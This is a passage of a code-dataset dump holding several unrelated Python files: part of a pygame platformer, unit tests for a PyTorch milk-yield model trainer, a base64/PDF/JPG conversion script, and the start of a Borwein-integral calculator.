self.move_and_process_blocks(level.blocks)\r\n self.check_world_boundaries(level)\r\n self.set_images()\r\n\r\nclass FlyMan(Enemy):\r\n \r\n def __init__(self, x, y, images):\r\n super().__init__(x, y, images)\r\n\r\n self.start_x = x\r\n self.start_y = y\r\n self.start_vx = -2\r\n self.start_vy = 0\r\n\r\n self.vx = self.start_vx\r\n self.vy = self.start_vy\r\n\r\n def move_and_process_blocks(self, blocks):\r\n self.rect.x += self.vx\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n for block in hit_list:\r\n if self.vx > 0:\r\n self.rect.right = block.rect.left\r\n self.reverse()\r\n elif self.vx < 0:\r\n self.rect.left = block.rect.right\r\n self.reverse()\r\n\r\n self.rect.y += self.vy\r\n hit_list = pygame.sprite.spritecollide(self, blocks, False)\r\n\r\n for block in hit_list:\r\n if self.vy > 0:\r\n self.rect.bottom = block.rect.top\r\n self.vy = 0\r\n elif self.vy < 0:\r\n self.rect.top = block.rect.bottom\r\n 
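# moving upward into the underside of a block: pin the top edge and zero the climb below\r\n                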
self.vy = 0\r\n\r\n    def update(self, level, hero):\r\n        if self.is_near(hero):\r\n            self.move_and_process_blocks(level.blocks)\r\n            self.check_world_boundaries(level)\r\n            self.set_images()\r\n\r\nclass OneUp(Entity):\r\n    def __init__(self, x, y, image):\r\n        super().__init__(x, y, image)\r\n\r\n    def apply(self, character):\r\n        character.lives += 1\r\n\r\nclass Heart(Entity):\r\n    def __init__(self, x, y, image):\r\n        super().__init__(x, y, image)\r\n\r\n    def apply(self, character):\r\n        character.hearts += 1\r\n        # bug fix: min() caps healing at max_hearts; the original max() let hearts grow past the cap\r\n        character.hearts = min(character.hearts, character.max_hearts)\r\n\r\nclass Powerup(Entity):\r\n    def __init__(self, x, y, image):\r\n        super().__init__(x, y, image)\r\n\r\n    def apply(self, character):\r\n        character.score += 100\r\n\r\nclass Bolt(Entity):\r\n    def __init__(self, x, y, image):\r\n        super().__init__(x, y, image)\r\n\r\n    def apply(self, character):\r\n        character.score -= 200\r\n        if character.score < 0:\r\n            character.score = 0\r\n\r\nclass Jetpack(Entity):\r\n    def __init__(self, x, y, image):\r\n        super().__init__(x, y, image)\r\n\r\n    def apply(self, character):\r\n        character.jetpack_on = True\r\n        character.jetpack_time = 3 * FPS\r\n        character.vy = 0\r\n        character.vx = 15\r\n        # the character being powered up is the hero, so there is no need to reach for the global game object\r\n        character.rect.y = 64\r\n\r\nclass Bubble(Entity):\r\n    def __init__(self, x, y, image):\r\n        super().__init__(x, y, image)\r\n\r\n    def apply(self, character):\r\n        character.invincibility = int(3 * FPS)\r\n\r\nclass Flag(Entity):\r\n    def __init__(self, x, y, image):\r\n        super().__init__(x, y, image)\r\n\r\nclass Level():\r\n\r\n    def __init__(self, file_path):\r\n        self.starting_blocks = []\r\n        self.starting_enemies = []\r\n        self.starting_coins = []\r\n        self.starting_powerups = []\r\n        self.starting_flag = []\r\n\r\n        self.blocks = pygame.sprite.Group()\r\n        self.enemies = pygame.sprite.Group()\r\n        self.coins = pygame.sprite.Group()\r\n        self.powerups = pygame.sprite.Group()\r\n        self.flag = pygame.sprite.Group()\r\n        self.active_sprites = pygame.sprite.Group()\r\n        self.inactive_sprites = pygame.sprite.Group()\r\n\r\n        with open(file_path, 'r') as f:\r\n            data = f.read()\r\n\r\n        map_data = json.loads(data)\r\n\r\n        self.width = map_data['width'] * GRID_SIZE\r\n        self.height = map_data['height'] * GRID_SIZE\r\n        self.time = map_data['time'] * FPS\r\n\r\n        self.start_x = map_data['start'][0] * GRID_SIZE\r\n        self.start_y = map_data['start'][1] * GRID_SIZE\r\n\r\n        for item in map_data['blocks']:\r\n            x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n            img = block_images[item[2]]\r\n            self.starting_blocks.append(Block(x, y, img))\r\n\r\n        for item in map_data['bears']:\r\n            x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n            self.starting_enemies.append(Bear(x, y, spikeman_images))\r\n\r\n        for item in map_data['monsters']:\r\n            x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n            self.starting_enemies.append(Monster(x, y, spikeball_images))\r\n\r\n        for item in map_data['flyman']:\r\n            x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n            self.starting_enemies.append(FlyMan(x, y, flyman_images))\r\n\r\n        for item in map_data['coins']:\r\n            x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n            self.starting_coins.append(Coin(x, y, coin_img))\r\n\r\n        for item in map_data['oneups']:\r\n            x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n            self.starting_powerups.append(OneUp(x, y, carrot_img))\r\n\r\n        for item in map_data['hearts']:\r\n            x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n            self.starting_powerups.append(Heart(x, y, powerup_img))\r\n\r\n        for item in map_data['powerup']:\r\n            x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n            
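# gold carrots are pure score pickups: Powerup.apply() above grants 100 points\r\n            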
self.starting_powerups.append(Powerup(x, y, gold_carrot_img))\r\n\r\n for item in map_data['bolt']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_powerups.append(Bolt(x, y, bolt_img))\r\n\r\n for item in map_data['jetpack']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_powerups.append(Jetpack(x, y, jetpack_img))\r\n\r\n for item in map_data['bubble']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_powerups.append(Bubble(x, y, bubble_img))\r\n\r\n for item in map_data['flag']:\r\n x, y = item[0] * GRID_SIZE, item[1] * GRID_SIZE\r\n self.starting_flag.append(Flag(x, y, portal_img))\r\n\r\n self.background_layer = pygame.Surface([self.width, self.height], pygame.SRCALPHA, 32)\r\n self.scenery_layer = pygame.Surface([self.width, self.height], pygame.SRCALPHA, 32)\r\n self.inactive_layer = pygame.Surface([self.width, self.height], pygame.SRCALPHA, 32)\r\n self.active_layer = pygame.Surface([self.width, self.height], pygame.SRCALPHA, 32)\r\n\r\n if map_data['background-color'] != \"\":\r\n self.background_layer.fill(map_data['background-color'])\r\n\r\n if map_data['background-img'] != \"\":\r\n background_img = pygame.image.load(map_data['background-img'])\r\n\r\n if map_data['background-fill-y']:\r\n h = background_img.get_height()\r\n w = int(background_img.get_width() * HEIGHT / h)\r\n background_img = pygame.transform.scale(background_img, (w, HEIGHT))\r\n\r\n if \"top\" in map_data['background-position']:\r\n start_y = 0\r\n elif \"bottom\" in map_data['background-position']:\r\n start_y = self.height - background_img.get_height()\r\n\r\n if map_data['background-repeat-x']:\r\n for x in range(0, self.width, background_img.get_width()):\r\n self.background_layer.blit(background_img, [x, start_y])\r\n else:\r\n self.background_layer.blit(background_img, [0, start_y])\r\n\r\n if map_data['scenery-img'] != \"\":\r\n scenery_img = pygame.image.load(map_data['scenery-img'])\r\n\r\n if map_data['scenery-fill-y']:\r\n h = scenery_img.get_height()\r\n w = int(scenery_img.get_width() * HEIGHT / h)\r\n scenery_img = pygame.transform.scale(scenery_img, (w, HEIGHT))\r\n\r\n if \"top\" in map_data['scenery-position']:\r\n start_y = 0\r\n elif \"bottom\" in map_data['scenery-position']:\r\n start_y = self.height - scenery_img.get_height()\r\n\r\n if map_data['scenery-repeat-x']:\r\n for x in range(0, self.width, scenery_img.get_width()):\r\n self.scenery_layer.blit(scenery_img, [x, start_y])\r\n else:\r\n self.scenery_layer.blit(scenery_img, [0, start_y])\r\n\r\n pygame.mixer.music.load(map_data['music'])\r\n\r\n self.gravity = map_data['gravity']\r\n self.terminal_velocity = map_data['terminal-velocity']\r\n\r\n self.completed = False\r\n\r\n self.blocks.add(self.starting_blocks)\r\n self.enemies.add(self.starting_enemies)\r\n self.coins.add(self.starting_coins)\r\n self.powerups.add(self.starting_powerups)\r\n self.flag.add(self.starting_flag)\r\n\r\n self.active_sprites.add(self.coins, self.enemies, self.powerups)\r\n self.inactive_sprites.add(self.blocks, self.flag)\r\n\r\n self.inactive_sprites.draw(self.inactive_layer)\r\n\r\n def calculate_time(self):\r\n self.time -= 1\r\n if self.time <= 0:\r\n self.time = 0\r\n\r\n def reset(self):\r\n self.enemies.add(self.starting_enemies)\r\n self.coins.add(self.starting_coins)\r\n self.powerups.add(self.starting_powerups)\r\n\r\n self.active_sprites.add(self.coins, self.enemies, self.powerups)\r\n\r\n for e in self.enemies:\r\n e.reset()\r\n\r\nclass Game():\r\n\r\n SPLASH = 0\r\n START 
= 1\r\n    PLAYING = 2\r\n    PAUSED = 3\r\n    LEVEL_COMPLETED = 4\r\n    GAME_OVER = 5\r\n    VICTORY = 6\r\n\r\n    def __init__(self):\r\n        self.window = pygame.display.set_mode([WIDTH, HEIGHT])\r\n        pygame.display.set_caption(TITLE)\r\n        self.clock = pygame.time.Clock()\r\n        self.done = False\r\n\r\n        self.reset()\r\n\r\n    def start(self):\r\n        self.level = Level(levels[self.current_level])\r\n        self.level.reset()\r\n        self.hero.respawn(self.level)\r\n\r\n    def advance(self):\r\n        # bug fix: bank the time bonus from the level just finished *before* start() replaces self.level,\r\n        # otherwise the bonus is computed from the next level's full starting time\r\n        self.hero.score += (self.level.time * 5)\r\n        self.current_level += 1\r\n        self.start()\r\n        self.stage = Game.START\r\n\r\n    def reset(self):\r\n        self.hero = Character(bunny_images)\r\n        self.current_level = 0\r\n        self.start()\r\n        self.stage = Game.SPLASH\r\n\r\n    def display_splash(self, surface):\r\n        line1 = Chocolate_Bar_Font.render(TITLE, 1, DARK_BLUE)\r\n        line2 = Chocolate_Bar_Font.render(\"Are you up to the challenge?\", 1, WHITE)\r\n        line3 = Chocolate_Bar_Font.render(\"PRESS ANY KEY TO START\", 1, WHITE)\r\n\r\n        x1 = WIDTH / 2 - line1.get_width() / 2\r\n        y1 = HEIGHT / 3 - line1.get_height() / 2\r\n\r\n        x2 = WIDTH / 2 - line2.get_width() / 2\r\n        y2 = y1 + line1.get_height() + 16\r\n\r\n        x3 = WIDTH / 2 - line3.get_width() / 2\r\n        y3 = HEIGHT - line3.get_height() - 64\r\n\r\n        bun_x1 = 64\r\n        bun_y1 = 64\r\n        bun_x2 = WIDTH - 128\r\n        bun_y2 = HEIGHT - 128\r\n\r\n        pygame.draw.rect(surface, PURPLE, [0, 0, WIDTH, HEIGHT])\r\n        surface.blit(line1, (x1, y1))\r\n        surface.blit(line2, (x2, y2))\r\n        surface.blit(line3, (x3, y3))\r\n        surface.blit(bunny_idle, (bun_x1, bun_y1))\r\n        surface.blit(bunny_idle, (bun_x1, bun_y2))\r\n        surface.blit(bunny_idle, (bun_x2, bun_y1))\r\n        surface.blit(bunny_idle, (bun_x2, bun_y2))\r\n\r\n    def display_message(self, surface, primary_text, secondary_text):\r\n        line1 = Chocolate_Bar_Font.render(primary_text, 1, WHITE)\r\n        line2 = Chocolate_Bar_Font.render(secondary_text, 1, WHITE)\r\n\r\n        x1 = WIDTH / 2 - line1.get_width() / 2\r\n        y1 = HEIGHT / 3 - line1.get_height() / 2\r\n\r\n        x2 = WIDTH / 2 - line2.get_width() / 2\r\n        y2 = y1 + line1.get_height() + 16\r\n\r\n        box_x = WIDTH / 2 - line2.get_width() / 2\r\n        box_y = HEIGHT / 3 - line1.get_height() / 2\r\n        box_w = line2.get_width()\r\n        box_h = line1.get_height() + line2.get_height() + 16\r\n\r\n        pygame.draw.rect(surface, PURPLE, [box_x, box_y, box_w, box_h])\r\n        surface.blit(line1, (x1, y1))\r\n        surface.blit(line2, (x2, y2))\r\n\r\n    def display_stats(self, surface):\r\n        hearts_text = Bubblegum_Font.render(\"Hearts: \" + str(self.hero.hearts) + \"/\" + str(self.hero.max_hearts), 1, WHITE)\r\n        lives_text = Bubblegum_Font.render(\"x \" + str(self.hero.lives), 1, WHITE)\r\n        score_text = Bubblegum_Font.render(\"Score: \" + str(self.hero.score), 1, WHITE)\r\n        level_text = Bubblegum_Font.render(\"Level: \" + str(self.current_level + 1), 1, WHITE)\r\n        coins_text = Bubblegum_Font.render(\"Coins: \" + str(self.hero.coins), 1, WHITE)\r\n        time_text = Bubblegum_Font.render(\"Time Remaining: \" + str(self.level.time//60), 1, WHITE)\r\n\r\n        surface.blit(score_text, (WIDTH - score_text.get_width() - 32, 32))\r\n        surface.blit(hearts_text, (32, 32))\r\n        surface.blit(bunny_idle, (32, 64))\r\n        surface.blit(lives_text, (128, 80))\r\n        surface.blit(level_text, (32, 128))\r\n        surface.blit(coins_text, (32, 160))\r\n        surface.blit(time_text, (32, 192))\r\n        if self.hero.jetpack_on:\r\n            jetpack_text = Bubblegum_Font.render(\"Jetpack Time: \" + str(self.hero.jetpack_time//60), 1, WHITE)\r\n            surface.blit(jetpack_text, (32, 224))\r\n\r\n    def display_credits(self, surface):\r\n        line1 = Chocolate_Bar_Font.render(\"CONGRATULATIONS!\", 1, WHITE)\r\n        line2 = Chocolate_Bar_Font.render(\"You are the ultimate bunny runner\", 1, WHITE)\r\n        line3 = Chocolate_Bar_Font.render(\"Score: \" + str(self.hero.score), 1, WHITE)\r\n        line4 = Chocolate_Bar_Font.render(\"Press R to Run Again\", 1, WHITE)\r\n        line5 = Bubblegum_Font.render(\"Bunny Run created by: Casey Groves\", 1, WHITE)\r\n\r\n        x1 = WIDTH / 2 - line1.get_width() / 2\r\n        y1 = HEIGHT / 5\r\n\r\n        x2 = WIDTH / 2 - line2.get_width() / 2\r\n        y2 = y1 + line2.get_height() + 16\r\n\r\n        x3 = WIDTH / 2 - line3.get_width() / 2\r\n        y3 = y2 + line3.get_height() + 16\r\n\r\n        x4 = WIDTH / 2 - line4.get_width() / 2\r\n        y4 = y3 + line4.get_height() + 16\r\n\r\n        x5 = WIDTH / 2 - line5.get_width() / 2\r\n        y5 = y4 + line5.get_height() + 64\r\n\r\n        pygame.draw.rect(surface, PURPLE, [0, 0, WIDTH, HEIGHT])\r\n        surface.blit(line1, (x1, y1))\r\n        surface.blit(line2, (x2, y2))\r\n        surface.blit(line3, (x3, y3))\r\n        surface.blit(line4, (x4, y4))\r\n        surface.blit(line5, (x5, y5))\r\n\r\n    def process_events(self):\r\n        for event in pygame.event.get():\r\n            if event.type == pygame.QUIT:\r\n                self.done = True\r\n\r\n            elif event.type == pygame.KEYDOWN:\r\n                if self.stage == Game.SPLASH or self.stage == Game.START:\r\n                    self.stage = Game.PLAYING\r\n                    play_music()\r\n\r\n                elif self.stage == Game.PLAYING:\r\n                    if event.key == JUMP:\r\n                        self.hero.jump(self.level.blocks)\r\n                    if event.key == pygame.K_f:\r\n                        self.hero.speed = 10\r\n                    else:\r\n                        # any other keypress drops the sprint back to normal speed\r\n                        self.hero.speed = 5\r\n\r\n                elif self.stage == Game.PAUSED:\r\n                    pass\r\n\r\n                elif self.stage == Game.LEVEL_COMPLETED:\r\n                    self.advance()\r\n\r\n                elif self.stage == Game.VICTORY or self.stage == Game.GAME_OVER:\r\n                    if event.key == pygame.K_r:\r\n                        self.reset()\r\n\r\n        pressed = pygame.key.get_pressed()\r\n\r\n        if self.stage == Game.PLAYING:\r\n            if not self.hero.jetpack_on:\r\n                if pressed[LEFT]:\r\n                    self.hero.move_left()\r\n                elif pressed[RIGHT]:\r\n                    self.hero.move_right()\r\n                else:\r\n                    self.hero.stop()\r\n\r\n    def update(self):\r\n        if self.stage == Game.PLAYING:\r\n            self.hero.update(self.level)\r\n            self.level.enemies.update(self.level, self.hero)\r\n            self.level.calculate_time()\r\n            if self.hero.jetpack_on:\r\n                self.hero.calculate_jetpack_time()\r\n\r\n            if self.level.completed:\r\n                if self.current_level < len(levels) - 1:\r\n                    self.stage = Game.LEVEL_COMPLETED\r\n                else:\r\n                    self.stage = Game.VICTORY\r\n                pygame.mixer.music.stop()\r\n\r\n            elif self.hero.lives == 0 or self.level.time == 0:\r\n                self.stage = Game.GAME_OVER\r\n                pygame.mixer.music.stop()\r\n\r\n            elif self.hero.hearts == 0:\r\n                self.level.reset()\r\n                self.hero.respawn(self.level)\r\n\r\n    def calculate_offset(self):\r\n        x = -1 * self.hero.rect.centerx + WIDTH / 2\r\n\r\n        if self.hero.rect.centerx < WIDTH / 2:\r\n            x = 0\r\n        elif self.hero.rect.centerx > self.level.width - WIDTH / 2:\r\n            x = -1 * self.level.width + WIDTH\r\n\r\n        return x, 0\r\n\r\n    def draw(self):\r\n        offset_x, offset_y = self.calculate_offset()\r\n\r\n        self.level.active_layer.fill(TRANSPARENT)\r\n        self.level.active_sprites.draw(self.level.active_layer)\r\n\r\n        if self.hero.invincibility % 3 < 2:\r\n            self.level.active_layer.blit(self.hero.image, [self.hero.rect.x, self.hero.rect.y])\r\n\r\n        self.window.blit(self.level.background_layer, [offset_x / 3, offset_y])\r\n        self.window.blit(self.level.scenery_layer, [offset_x / 2, offset_y])\r\n        self.window.blit(self.level.inactive_layer, [offset_x, offset_y])\r\n        
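# note: the background above pans at 1/3 and the scenery at 1/2 of the camera offset, while the\r\n        # tile and sprite layers move at the full offset, giving a simple parallax depth effect\r\n        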
self.window.blit(self.level.active_layer, [offset_x, offset_y])\r\n\r\n self.display_stats(self.window)\r\n\r\n if self.stage == Game.SPLASH:\r\n self.display_splash(self.window)\r\n elif self.stage == Game.START:\r\n self.display_message(self.window, \"Ready?!!!\", \"Press any key to start\")\r\n elif self.stage == Game.PAUSED:\r\n pass\r\n elif self.stage == Game.LEVEL_COMPLETED:\r\n self.display_message(self.window, \"Level Complete\", \"Press any key to continue\")\r\n elif self.stage == Game.VICTORY:\r\n self.display_credits(self.window)\r\n elif self.stage == Game.GAME_OVER:\r\n self.display_message(self.window, \"Game Over\", \"Press 'R' to restart\")\r\n\r\n pygame.display.flip()\r\n\r\n def loop(self):\r\n while not self.done:\r\n self.process_events()\r\n self.update()\r\n self.draw()\r\n self.clock.tick(FPS)\r\n\r\nif __name__ == \"__main__\":\r\n game = Game()\r\n game.start()\r\n game.loop()\r\n pygame.quit()\r\n sys.exit()\r\n","sub_path":"Casey's Bunny Run.py","file_name":"Casey's Bunny Run.py","file_ext":"py","file_size_in_byte":33881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"370953604","text":"import os\nimport sqlite3\nimport unittest\nfrom collections import Counter\n\nimport peewee as pw\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils.data as data\n\nimport milk_production_analysis.db.training as training\nimport milk_production_analysis.model.datasets as datasets\nimport milk_production_analysis.model.nets as nets\nimport milk_production_analysis.model.trainer as trainer\n\nfrom . import test_nets\nfrom .. import test_settings\n\ntraining.initialize_db(db_path=test_settings.TRAINING_DB_PATH)\n\n\nclass ModelTrainerTests(unittest.TestCase):\n\n def setUp(self):\n x = torch.rand(1000, 10)\n y = torch.randint(0, 1, (1000, 1))\n self.batch_size = 100\n self.dataset = data.TensorDataset(x, y)\n self.model = nets.BaseSupervisedModel(\n optimizer=optim.SGD,\n optimizer_params={'lr': 1e-2},\n model=nn.Linear(x.size()[-1], y.size()[-1]),\n objective_loss=nn.MSELoss())\n self.trainer = trainer.BaseModelTrainer(batch_size=self.batch_size, num_workers=2, db_path=test_settings.TRAINING_DB_PATH)\n\n def tearDown(self):\n del self.trainer, self.model\n\n def test_A01_data_splits(self):\n test, train_full = self.trainer.split_test_train(dataset=self.dataset, test_split_ratio=0.2)\n self.assertEqual(len(train_full), int(len(self.dataset)*(1-0.2)))\n self.assertEqual(len(test), len(self.dataset)-len(train_full))\n\n train, validate = self.trainer.split_train_validate(dataset=train_full, train_split_ratio=0.8)\n self.assertEqual(len(train), 1)\n self.assertEqual(len(train[0]), 1)\n self.assertEqual(len(train[0][0]), int(len(train_full)*0.8))\n self.assertEqual(len(validate), 1)\n self.assertEqual(len(validate[0]), len(train_full)-len(train[0][0]))\n\n train, validate = self.trainer.split_cross_validation(dataset=train_full, cv_folds=3)\n self.assertEqual(len(train), 3)\n self.assertEqual(len(train[0]), 3-1)\n self.assertEqual(len(train[0][0]), int(len(train_full)/3))\n self.assertEqual(len(validate), 3)\n self.assertEqual(len(validate[0]), int(len(train_full)/3))\n\n def test_A02_multithreaded_data_loading(self):\n test, train_full = self.trainer.split_test_train(dataset=self.dataset, test_split_ratio=0.2)\n train, validate = self.trainer.split_train_validate(dataset=train_full, train_split_ratio=0.8)\n\n self.assertGreater(len(test), self.batch_size)\n 
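# each split must exceed one batch so that every DataLoader built below yields at least one full batch\n        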
self.assertGreater(len(train[0][0]), self.batch_size)\n self.assertGreater(len(validate[0]), self.batch_size)\n\n batches = self.trainer.create_dataloader(self.dataset)\n self.assertEqual(len(batches), int(len(self.dataset)/self.batch_size))\n del batches\n\n test_batches = self.trainer.create_dataloader(test)\n self.assertEqual(len(test_batches), int((len(self.dataset)-len(train_full))/self.batch_size))\n train_batches = self.trainer.create_dataloader(train[0][0])\n self.assertEqual(len(train_batches), int((len(train_full)*0.8)/self.batch_size))\n validate_batches = self.trainer.create_dataloader(validate[0])\n self.assertEqual(len(validate_batches), int((len(train_full)-len(train[0][0]))/self.batch_size))\n for batches in [train_batches, validate_batches, test_batches]:\n for _ in batches:\n pass\n del batches\n\n def test_A03_single_epoch_trainvalidatesplit_training(self):\n train, validate = self.trainer.split_train_validate(dataset=self.dataset, train_split_ratio=0.8)\n print(len(train), len(train[0]), len(train[0][0]))\n print(len(validate), len(validate[0]))\n train_batches = self.trainer.create_dataloader(train[0][0])\n print(len(train_batches))\n validate_batches = self.trainer.create_dataloader(validate[0])\n print(len(validate_batches))\n self.model.process_batches(batches=train_batches, phase='train')\n self.model.process_batches(batches=validate_batches, phase='validate')\n del train_batches, validate_batches\n\n def test_A04_single_epoch_kfold_cross_validation_training(self):\n train, validate = self.trainer.split_cross_validation(dataset=self.dataset, cv_folds=3)\n for batch in train[0]:\n self.model.process_batches(batches=self.trainer.create_dataloader(batch), phase='train')\n self.model.process_batches(batches=self.trainer.create_dataloader(validate[0]), phase='validate')\n\n def test_A05_single_epoch_processing_the_test_set(self):\n test, _ = self.trainer.split_test_train(dataset=self.dataset, test_split_ratio=0.3)\n self.model.process_batches(batches=self.trainer.create_dataloader(test), phase='test')\n\n def test_A06_multiepoch_traintestsplit_training(self):\n db_size_pre = len(training.TrainedModel)\n self.trainer.train(\n dataset=self.dataset,\n models=self.model,\n epochs=2,\n use_cv=False,\n train_split_ratio=0.8,\n use_early_stopping=False)\n self.assertGreater(len(training.TrainedModel), db_size_pre)\n\n def test_A07_multiepoch_kfold_cross_validation_training(self):\n db_size_pre = len(training.TrainedModel)\n self.trainer.train(\n dataset=self.dataset,\n models=self.model,\n epochs=2,\n use_cv=True,\n cv_folds=3,\n use_early_stopping=False)\n self.assertGreater(len(training.TrainedModel), db_size_pre)\n\n def test_A08_multiepoch_early_stopping_training(self):\n db_size_pre = len(training.TrainedModel)\n self.trainer.train(\n dataset=self.dataset,\n models=self.model,\n epochs=2,\n use_cv=False,\n train_split_ratio=0.8,\n use_early_stopping=True,\n patience=1)\n self.assertGreater(len(training.TrainedModel), db_size_pre)\n\n def test_A09_multimodel_training(self):\n db_size_pre = len(training.TrainedModel)\n with self.assertRaises(pw.IntegrityError):\n self.trainer.train(\n dataset=self.dataset,\n models=[self.model, self.model],\n epochs=2,\n use_cv=False,\n train_split_ratio=0.8,\n use_early_stopping=True,\n patience=1)\n self.assertGreater(len(training.TrainedModel), db_size_pre)\n\n def test_A10_random_patience_initializations(self):\n self.assertEqual(len(self.trainer.initialize_random_patiences([])), 0)\n 
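# presumably one random patience value is drawn per early-stopping flag handed in\n        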
self.assertEqual(len(self.trainer.initialize_random_patiences([True, True])), 2)\n\n\nclass MilkYieldModelTrainerTests():\n\n def test_B01_optimizing_with_rmsprop(self):\n self.model = nets.MilkYieldLSTM(optimizer=optim.RMSprop, debug=True)\n test_nets.rename_model(self.model)\n db_size_pre = len(training.TrainedModel)\n self.trainer.train(\n dataset=self.dataset,\n models=self.model,\n epochs=2,\n use_cv=False,\n train_split_ratio=0.8,\n use_early_stopping=False)\n self.assertGreater(len(training.TrainedModel), db_size_pre)\n\n def test_B02_gru(self):\n self.model = nets.MilkYieldGRU(optimizer=optim.RMSprop, debug=True)\n test_nets.rename_model(self.model)\n db_size_pre = len(training.TrainedModel)\n self.trainer.train(\n dataset=self.dataset,\n models=self.model,\n epochs=2,\n use_cv=False,\n train_split_ratio=0.8,\n use_early_stopping=False)\n self.assertGreater(len(training.TrainedModel), db_size_pre)\n\n def test_B03_random_model_initializations(self):\n models = self.trainer.initialize_random_models(n_models=2, debug=True)\n model_inits = self.trainer.initialized_models_parameters\n self.assertNotEqual(Counter(model_inits[models[0]]), Counter(model_inits[models[1]]))\n\n def test_B04_model_parameters_kept_separate(self):\n models = [nets.MilkYieldGRU(optimizer=optim.RMSprop, debug=True),\n nets.MilkYieldLSTM(optimizer=optim.RMSprop, debug=True)]\n states = self.trainer.persist_trained_model_states(models)\n m1l1, m2l1 = len(states[models[0]]), len(states[models[1]])\n states = self.trainer.persist_trained_model_states(models)\n m1l2, m2l2 = len(states[models[0]]), len(states[models[1]])\n self.assertGreater(m1l2, m1l1)\n self.assertGreater(m2l2, m2l1)\n for model in models:\n m_states = states[model]\n self.assertEqual(len(m_states), 2)\n for key in m_states[0].keys():\n self.assertEqual(len(m_states[0][key]), len(m_states[1][key]))\n\n def test_B05_random_search(self):\n models = self.trainer.initialize_random_models(n_models=2, debug=True)\n db_size_pre = len(training.TrainedModel)\n self.trainer.train(\n dataset=self.dataset,\n models=models,\n epochs=1,\n use_cv=False,\n train_split_ratio=0.8,\n use_early_stopping=True)\n self.assertGreater(len(training.TrainedModel), db_size_pre)\n self.assertEqual(len(training.TrainedModel), db_size_pre+2)\n\n\nclass MilkYieldModelTrainerDBTests(ModelTrainerTests, MilkYieldModelTrainerTests):\n\n def setUp(self):\n self.assertTrue(os.path.isfile(test_settings.MILKING_DB_PATH))\n self.batch_size = 4\n self.dataset = datasets.MilkYieldDataset(data_source='db', data_source_path=test_settings.MILKING_DB_PATH, log=False)\n self.trainer = trainer.MilkYieldModelTrainer(batch_size=self.batch_size, num_workers=2, db_path=test_settings.TRAINING_DB_PATH)\n self.model = nets.MilkYieldLSTM(optimizer=optim.SGD, optimizer_params={'lr': 1e-5}, debug=True)\n test_nets.rename_model(self.model)\n\n\nclass MilkYieldModelTrainerCSVTests(ModelTrainerTests, MilkYieldModelTrainerTests):\n\n def setUp(self):\n self.assertTrue(os.path.isfile(test_settings.CSV_PATH))\n self.batch_size = 4\n self.dataset = datasets.MilkYieldDataset(data_source='csv', data_source_path=test_settings.CSV_PATH, log=False)\n self.trainer = trainer.MilkYieldModelTrainer(batch_size=self.batch_size, num_workers=2, db_path=test_settings.TRAINING_DB_PATH)\n self.model = nets.MilkYieldLSTM(optimizer=optim.SGD, optimizer_params={'lr': 1e-5}, debug=True)\n test_nets.rename_model(self.model)\n\n\nclass MilkYieldModelTrainerHDF5Tests(ModelTrainerTests, MilkYieldModelTrainerTests):\n\n def setUp(self):\n 
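# guard: fail fast if the HDF5 fixture file is missing before building the dataset\n        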
self.assertTrue(os.path.isfile(test_settings.HDF5_PATH))\n self.batch_size = 4*30\n self.dataset = datasets.MilkYieldDataset(data_source='hdf5', data_source_path=test_settings.HDF5_PATH, log=False)\n self.trainer = trainer.MilkYieldModelTrainer(batch_size=self.batch_size, num_workers=2, db_path=test_settings.TRAINING_DB_PATH)\n self.model = nets.MilkYieldLSTM(optimizer=optim.SGD, optimizer_params={'lr': 1e-5}, debug=True)\n test_nets.rename_model(self.model)\n","sub_path":"tests/milk_production_analysis/test_model/test_trainer.py","file_name":"test_trainer.py","file_ext":"py","file_size_in_byte":11111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"562210827","text":"from wand.image import Image\nfrom wand.color import Color\nimport base64\n\ndata = open(\"pdfto64.txt\", \"rb\").read()\nf = open(\"64topdf.pdf\", \"w\")\nf.write(data.decode('base64'))\nf.close()\n\nwith Image(filename=\"64topdf.pdf\", resolution=100) as img:\n with Image(width=img.width, height=img.height, background=Color(\"white\")) as bg:\n bg.composite(img,0,0)\n bg.save(filename=\"pdftojpg.jpg\")\n\ndata = open(\"pdftojpg.jpg\", \"rb\").read().encode(\"base64\")\nf = open(\"jpgto64.txt\", \"w\")\nf.write(data)\nf.close()\n","sub_path":"Other files/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"473997726","text":"import sys\nimport math\n\n\ndef display_help():\n if len(sys.argv) == 2:\n if sys.argv[1] == '-h' or sys.argv[1] == '--help':\n print(\"USAGE\")\n print(\"\\t./110borwein n\\n\")\n print(\"DESCRIPTION\")\n print(\"\\tn\\tconstant defining the integral to be computed\")\n sys.exit(0)\n else:\n sys.exit(84)\n\n\ndef calc(x):\n res = 1\n i = 0\n n = float(sys.argv[1])\n while i <= n:\n if x != 0:\n res *= math.sin(x / (2 * i + 1)) / (x / (2 * i + 1))\n i += 1\n return res\n\n\ndef midpoint():\n h = 0.5\n i = 0.0\n res = 0.0\n while (i < 10000):\n x = i / 2\n res += calc(x + 0.25)\n i += 1\n res *= 0.5\n diff = res - (math.pi * 0.5)\n print(\"Midpoint:\")\n print(\"I%d = %.10f\" % (int(sys.argv[1]), res))\n if (round(diff, 10) == -0):\n print(\"diff = 0.0000000000\")\n else:\n print(\"diff = %.10f\" % (math.fabs(diff)))\n print()\n\n\ndef trapezoid():\n h = 0.5\n res = 0\n i = 1.0\n while (i < 10000):\n x = i * h\n res += calc(x)\n i += 1\n res = ((res * 2) + calc(0) + calc(5000))\n diff = (res * h / 2) - 